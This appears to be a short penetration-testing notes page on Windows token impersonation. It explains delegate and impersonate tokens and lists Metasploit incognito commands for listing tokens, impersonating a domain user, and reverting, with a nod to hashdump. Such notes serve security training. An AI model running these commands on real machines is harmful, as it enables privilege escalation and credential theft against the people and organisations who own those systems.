search

Token Impersonation

Permissions: User Permissions

hashtag
What are tokens?

  • Temporary Keys that allow you to access to a system/network without having to provide credentials each time you access a file.

  • Think cookies but in this case for computers.

hashtag
Types of Tokens

  • Delegate Token - Create for logging into a machine or using Remote Desktop.

  • Impersonate Token - Basically is a "non-interactive". Such as attaching a network drive or a domain logon script.

hashtag
Execution

hashtag
Metasploit

Once you have a shell session open, type the following commands.

list_tokens -u   // List's all the user tokens on a machine

load incognito   // load the tool built-in metasploit 

impersonate_token <domian>\\<user> // impersonate the user token

rev2self  // if you have any problems executing programs like hashdump
PreviousPrivilege EscalationNextPrint Nightmare (CVE-2021-1675)

Last updated